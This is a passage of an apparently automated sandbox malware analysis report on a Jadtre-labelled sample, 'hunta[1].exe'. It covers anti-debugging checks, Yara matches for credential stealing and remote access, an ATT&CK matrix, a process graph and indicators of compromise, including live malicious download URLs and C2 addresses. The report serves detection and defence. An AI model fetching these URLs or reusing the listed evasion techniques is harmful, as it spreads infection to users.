            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: filemonclass
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: NTICE
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: SICE
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: SIWVID
            Source: C:\Users\user\Desktop\hunta[1].exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\hunta[1].exeCode function: 2_2_059B056A rdtsc 2_2_059B056A
            Source: C:\Users\user\Desktop\hunta[1].exeCode function: 2_2_01431044 mov eax, dword ptr fs:[00000030h]2_2_01431044
            Source: C:\Users\user\Desktop\hunta[1].exeCode function: 2_2_00E94AB0 mov eax, dword ptr fs:[00000030h]2_2_00E94AB0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 14_2_008B1044 mov eax, dword ptr fs:[00000030h]14_2_008B1044
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 14_2_00314AB0 mov eax, dword ptr fs:[00000030h]14_2_00314AB0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 15_2_008B1044 mov eax, dword ptr fs:[00000030h]15_2_008B1044
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 15_2_00314AB0 mov eax, dword ptr fs:[00000030h]15_2_00314AB0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 21_2_00821044 mov eax, dword ptr fs:[00000030h]21_2_00821044
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 21_2_00284AB0 mov eax, dword ptr fs:[00000030h]21_2_00284AB0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 24_2_00821044 mov eax, dword ptr fs:[00000030h]24_2_00821044
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 24_2_00284AB0 mov eax, dword ptr fs:[00000030h]24_2_00284AB0
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\149657b0.bat" "Jump to behavior
            Source: hunta[1].exe, hunta[1].exe, 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
            Source: SciTE.exe.4.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
            Source: C:\Users\user\Desktop\hunta[1].exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\hunta[1].exeCode function: 2_2_00F5C92A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,2_2_00F5C92A
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeCode function: 4_2_0021139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,4_2_0021139F
            Source: C:\Users\user\Desktop\hunta[1].exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: WwKLWFk.exe PID: 7456, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WwKLWFk.exe PID: 1836, type: MEMORYSTR
            Source: Yara matchFile source: 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: hunta[1].exe PID: 7416, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 8104, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 8124, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 5640, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 4228, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: WwKLWFk.exe PID: 7456, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WwKLWFk.exe PID: 1836, type: MEMORYSTR
            Source: Yara matchFile source: 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: hunta[1].exe PID: 7416, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 8104, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 8124, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 5640, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 4228, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            Valid Accounts2
            Native API
            1
            Scripting
            1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            11
            Input Capture
            11
            System Time Discovery
            1
            Taint Shared Content
            1
            Archive Collected Data
            2
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            3
            Obfuscated Files or Information
            LSASS Memory4
            File and Directory Discovery
            Remote Desktop Protocol11
            Input Capture
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job
            1
            Scheduled Task/Job
            12
            Process Injection
            13
            Software Packing
            Security Account Manager215
            System Information Discovery
            SMB/Windows Admin SharesData from Network Shared Drive11
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCron1
            Registry Run Keys / Startup Folder
            1
            Scheduled Task/Job
            1
            DLL Side-Loading
            NTDS1
            Query Registry
            Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
            Registry Run Keys / Startup Folder
            1
            Masquerading
            LSA Secrets751
            Security Software Discovery
            SSHKeylogging12
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts24
            Virtualization/Sandbox Evasion
            Cached Domain Credentials24
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation
            DCSync2
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Process Injection
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1480972 Sample: hunta[1].exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 55 ddos.dnsnb8.net 2->55 61 Antivirus detection for URL or domain 2->61 63 Antivirus detection for dropped file 2->63 65 Antivirus / Scanner detection for submitted sample 2->65 67 9 other signatures 2->67 9 hunta[1].exe 1 10 2->9         started        14 RageMP131.exe 2 2->14         started        16 MPGPH131.exe 2 2->16         started        18 2 other processes 2->18 signatures3 process4 dnsIp5 59 193.233.132.62, 49709, 49713, 49714 FREE-NET-ASFREEnetEU Russian Federation 9->59 47 C:\Users\user\AppData\Local\...\WwKLWFk.exe, PE32 9->47 dropped 49 C:\Users\user\AppData\Local\...\RageMP131.exe, PE32 9->49 dropped 51 C:\ProgramData\MPGPH131\MPGPH131.exe, PE32 9->51 dropped 53 2 other malicious files 9->53 dropped 77 Detected unpacking (changes PE section rights) 9->77 79 Found stalling execution ending in API Sleep call 9->79 81 Uses schtasks.exe or at.exe to add and modify task schedules 9->81 99 2 other signatures 9->99 20 WwKLWFk.exe 18 9->20         started        25 schtasks.exe 1 9->25         started        27 schtasks.exe 1 9->27         started        83 Antivirus detection for dropped file 14->83 85 Multi AV Scanner detection for dropped file 14->85 87 Tries to detect sandboxes and other dynamic analysis tools (window names) 14->87 29 WwKLWFk.exe 1 27 14->29         started        89 Machine Learning detection for dropped file 16->89 91 Tries to evade debugger and weak emulator (self modifying code) 16->91 93 Hides threads from debuggers 16->93 95 Tries to detect sandboxes / dynamic malware analysis system (registry check) 18->95 97 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->97 file6 signatures7 process8 dnsIp9 57 ddos.dnsnb8.net 44.221.84.105, 49707, 49708, 49710 AMAZON-AESUS United States 20->57 41 C:\Program Files\7-Zip\Uninstall.exe, PE32 20->41 dropped 43 C:\Program Files (x86)\AutoIt3\...\SciTE.exe, PE32 20->43 dropped 45 C:\Program Files (x86)\AutoIt3\...\MyProg.exe, MS-DOS 20->45 dropped 69 Antivirus detection for dropped file 20->69 71 Multi AV Scanner detection for dropped file 20->71 73 Detected unpacking (changes PE section rights) 20->73 75 2 other signatures 20->75 31 WerFault.exe 19 16 20->31         started        33 conhost.exe 25->33         started        35 conhost.exe 27->35         started        37 cmd.exe 29->37         started        file10 signatures11 process12 process13 39 conhost.exe 37->39         started       

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            hunta[1].exe95%ReversingLabsWin32.Virus.Jadtre
            hunta[1].exe100%AviraW32/Jadtre.B
            hunta[1].exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
            C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
            C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
            C:\Users\user\AppData\Local\Temp\WwKLWFk.exe100%AviraTR/Dldr.Small.Z.haljq
            C:\ProgramData\MPGPH131\MPGPH131.exe100%AviraW32/Jadtre.B
            C:\Users\user\AppData\Local\RageMP131\RageMP131.exe100%AviraW32/Jadtre.B
            C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
            C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
            C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\WwKLWFk.exe100%Joe Sandbox ML
            C:\ProgramData\MPGPH131\MPGPH131.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\RageMP131\RageMP131.exe100%Joe Sandbox ML
            C:\ProgramData\MPGPH131\MPGPH131.exe95%ReversingLabsWin32.Virus.Jadtre
            C:\Users\user\AppData\Local\RageMP131\RageMP131.exe95%ReversingLabsWin32.Virus.Jadtre
            C:\Users\user\AppData\Local\Temp\WwKLWFk.exe92%ReversingLabsWin32.Trojan.Madeba
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://www.scintilla.org/scite.rng0%URL Reputationsafe
            http://www.rftp.comJosiah0%URL Reputationsafe
            http://www.activestate.com0%URL Reputationsafe
            http://www.activestate.comHolger0%URL Reputationsafe
            http://upx.sf.net0%URL Reputationsafe
            http://www.rftp.com0%URL Reputationsafe
            http://ddos.dnsnb8.net:799/cj//k2.rar100%URL Reputationmalware
            http://www.baanboard.comBrendon0%URL Reputationsafe
            https://www.smartsharesystems.com/0%URL Reputationsafe
            http://www.scintilla.org0%URL Reputationsafe
            https://t.me/RiseProSUPPORTv0%Avira URL Cloudsafe
            http://ddos.dnsnb8.net:799/cj//k3.rars100%Avira URL Cloudphishing
            http://www.spaceblue.comMathias0%URL Reputationsafe
            https://www.smartsharesystems.com/Morten0%URL Reputationsafe
            http://ddos.dnsnb8.net:799/cj//k1.rarA100%Avira URL Cloudphishing
            http://www.develop.com0%URL Reputationsafe
            http://www.lua.org0%URL Reputationsafe
            http://ddos.dnsnb8.net/100%URL Reputationmalware
            http://ddos.dnsnb8.net:799/cj//k3.rar100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k1.rarppData100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k1.rar100%URL Reputationmalware
            http://www.spaceblue.com0%URL Reputationsafe
            http://www.winimage.com/zLibDll0%URL Reputationsafe
            http://www.baanboard.com0%URL Reputationsafe
            http://www.develop.comDeepak0%URL Reputationsafe
            https://t.me/RiseProSUPPORT%0%Avira URL Cloudsafe
            http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
            https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll0%Avira URL Cloudsafe
            http://ddos.dnsnb8.net:799/cj//k3.rar2OneDrive=C:100%Avira URL Cloudphishing
            https://t.me/RiseProSUPPORT0%Avira URL Cloudsafe
            http://ddos.dnsnb8.net:799/cj//k2.rarl100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k2.rar1100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k1.rarV100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k5.rar100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net/O100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k2.rar8100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net/d100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k3.rar5100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k5.rarC:100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k4.rar100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k1.rarcC:100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k1.rarc100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k2.rarfC:100%Avira URL Cloudphishing
            NameIPActiveMaliciousAntivirus DetectionReputation
            ddos.dnsnb8.net
            44.221.84.105
            truefalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://ddos.dnsnb8.net:799/cj//k3.rartrue
              • Avira URL Cloud: malware
              unknown
              http://ddos.dnsnb8.net:799/cj//k2.rartrue
              • URL Reputation: malware
              unknown
              http://ddos.dnsnb8.net:799/cj//k5.rarfalse
              • Avira URL Cloud: phishing
              unknown
              http://ddos.dnsnb8.net:799/cj//k1.rartrue
              • URL Reputation: malware
              unknown
              http://ddos.dnsnb8.net:799/cj//k4.rarfalse
              • Avira URL Cloud: malware
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://ddos.dnsnb8.net:799/cj//k1.rarAWwKLWFk.exe, 00000016.00000002.1647432122.0000000000A18000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A10000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              https://t.me/RiseProSUPPORTvhunta[1].exe, 00000002.00000002.3735222371.0000000001ACE000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3735676016.0000000000E7E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k3.rarsWwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              http://www.scintilla.org/scite.rngSciTE.exe.4.drfalse
              • URL Reputation: safe
              unknown
              http://www.rftp.comJosiahSciTE.exe.4.drfalse
              • URL Reputation: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k1.rarppDataWwKLWFk.exe, 00000004.00000003.1288946208.00000000011CB000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              http://www.activestate.comSciTE.exe.4.drfalse
              • URL Reputation: safe
              unknown
              http://www.activestate.comHolgerSciTE.exe.4.drfalse
              • URL Reputation: safe
              unknown
              http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DEWwKLWFk.exe, 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmp, WwKLWFk.exe, 00000004.00000003.1268128954.0000000000DF0000.00000004.00001000.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000003.1466940967.0000000000980000.00000004.00001000.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dllhunta[1].exe, 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, hunta[1].exe, 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://t.me/RiseProSUPPORT%RageMP131.exe, 00000018.00000002.3735277102.0000000000E88000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://upx.sf.netAmcache.hve.4.drfalse
              • URL Reputation: safe
              unknown
              http://www.rftp.comSciTE.exe.4.drfalse
              • URL Reputation: safe
              unknown
              https://t.me/RiseProSUPPORThunta[1].exe, 00000002.00000002.3735222371.0000000001ACE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3734942241.000000000105D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000F.00000002.3734938152.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3735676016.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3735277102.0000000000E88000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k3.rar2OneDrive=C:WwKLWFk.exe, 00000004.00000002.1418971368.0000000001210000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              http://www.baanboard.comBrendonSciTE.exe.4.drfalse
              • URL Reputation: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k2.rar1WwKLWFk.exe, 00000004.00000002.1418971368.000000000116E000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              https://www.smartsharesystems.com/SciTE.exe.4.drfalse
              • URL Reputation: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k2.rarlWwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              http://www.scintilla.orgSciTE.exe.4.drfalse
              • URL Reputation: safe
              unknown
              http://www.spaceblue.comMathiasSciTE.exe.4.drfalse
              • URL Reputation: safe
              unknown
              https://www.smartsharesystems.com/MortenSciTE.exe.4.drfalse
              • URL Reputation: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k2.rar8WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://www.develop.comSciTE.exe.4.drfalse
              • URL Reputation: safe
              unknown
              http://www.lua.orgSciTE.exe.4.drfalse
              • URL Reputation: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k1.rarVWwKLWFk.exe, 00000004.00000003.1288946208.00000000011CB000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              http://ddos.dnsnb8.net/WwKLWFk.exe, 00000004.00000003.1288946208.0000000001188000.00000004.00000020.00020000.00000000.sdmptrue
              • URL Reputation: malware
              unknown
              http://ddos.dnsnb8.net/dWwKLWFk.exe, 00000004.00000003.1288946208.0000000001188000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              http://www.spaceblue.comSciTE.exe.4.drfalse
              • URL Reputation: safe
              unknown
              http://www.winimage.com/zLibDllhunta[1].exe, 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, hunta[1].exe, 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.baanboard.comSciTE.exe.4.drfalse
              • URL Reputation: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k3.rar5WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://www.develop.comDeepakSciTE.exe.4.drfalse
              • URL Reputation: safe
              unknown
              http://ddos.dnsnb8.net/OWwKLWFk.exe, 00000004.00000003.1288946208.0000000001188000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://ddos.dnsnb8.net:799/cj//k5.rarC:WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://ddos.dnsnb8.net:799/cj//k1.rarcC:WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              http://ddos.dnsnb8.net:799/cj//k1.rarcWwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000003.1487791068.0000000000A78000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              http://ddos.dnsnb8.net:799/cj//k2.rarfC:WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              44.221.84.105
              ddos.dnsnb8.netUnited States
              14618AMAZON-AESUSfalse
              193.233.132.62
              unknownRussian Federation
              2895FREE-NET-ASFREEnetEUfalse
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1480972
              Start date and time:2024-07-25 02:15:30 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 12m 57s
              Hypervisor based Inspection enabled:false
              Report type:full
